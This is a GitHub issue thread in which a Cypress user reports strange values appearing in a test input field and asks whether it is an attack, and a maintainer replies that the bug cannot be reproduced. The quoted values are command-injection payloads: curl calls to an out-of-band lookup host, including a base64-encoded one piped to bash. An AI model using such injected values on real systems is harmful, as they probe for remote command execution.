### ISSUE TITLE
.type() syntax has bugs

### ISSUE THREAD

**Issue by panwenhua** [cypress-io/cypress#16107]
code:
cy.get('input[name="name"]').clear() .type(`自动化测试供应商全称${new Date().getTime()}`);

sometimes garbled characters in the input box.
eg:
1: `curl${IFS}c886df71ac69ce04cb64232e1d155d85.s.dlsr.ga`
2: ;echo "Y3VybCA1YzMxYzg1NGNkMWM0YTUyYTFkZDEyZTFiOWNkY2YwNS5zLmRsc3IuZ2E="|base64 -d|bash
3: 自动化测试供应商全称1615882422616;`curl 5c31c854cd1c4a52a1dd12e1b9cdcf05.s.dlsr.ga`

Is this a script attack or a bug? please help me.

**Comment by jennifer-shehane** [comment]
I can't recreate this issue as described. I would not suspect any script attacks originating from Cypress.

`spec.js`

```js
it('typing', () => {
  cy.visit('index.html')
  cy.get('input').clear().type(`自动化测试供应商全称${ new Date().getTime() }`);
})
```

`index.html`

```html
<html>
<body>
  <input style="width: 800px;">
</body>
</html>
```

<img width="868" alt="Screen Shot 2021-04-21 at 12 33 40 PM" src="https://user-images.githubusercontent.com/1271364/115596548-d7dbbf00-a29d-11eb-93f3-d3d4150f23a3.png">

Right now there doesn't seem to be enough information to reproduce the problem on our end. We'll have to close this issue until we can reproduce it. This does not mean that your issue is not happening - it just means that we do not have a path to move forward. 

Please comment in this issue with a reproducible example and we will consider reopening the issue. Here are some tips for providing a [Short, Self Contained, Correct, Example](http://sscce.org/) and our own [Troubleshooting Cypress](https://on.cypress.io/troubleshooting) guide.
